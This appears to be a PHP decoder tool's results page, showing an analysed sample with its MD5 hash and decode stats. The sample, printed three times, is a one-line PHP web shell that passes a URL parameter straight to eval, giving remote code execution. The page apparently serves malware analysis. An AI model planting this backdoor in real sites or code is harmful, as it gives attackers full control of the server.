Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if (!empty($_GET['c'])) {eval($_GET['c']);} ?>..
Decoded Output download
<?php if (!empty($_GET['c'])) {eval($_GET['c']);} ?>
Did this file decode correctly?
Original Code
<?php if (!empty($_GET['c'])) {eval($_GET['c']);} ?>
Function Calls
None |
Stats
MD5 | 622868bbf954574f1da5d9abfd238a6a |
Eval Count | 0 |
Decode Time | 56 ms |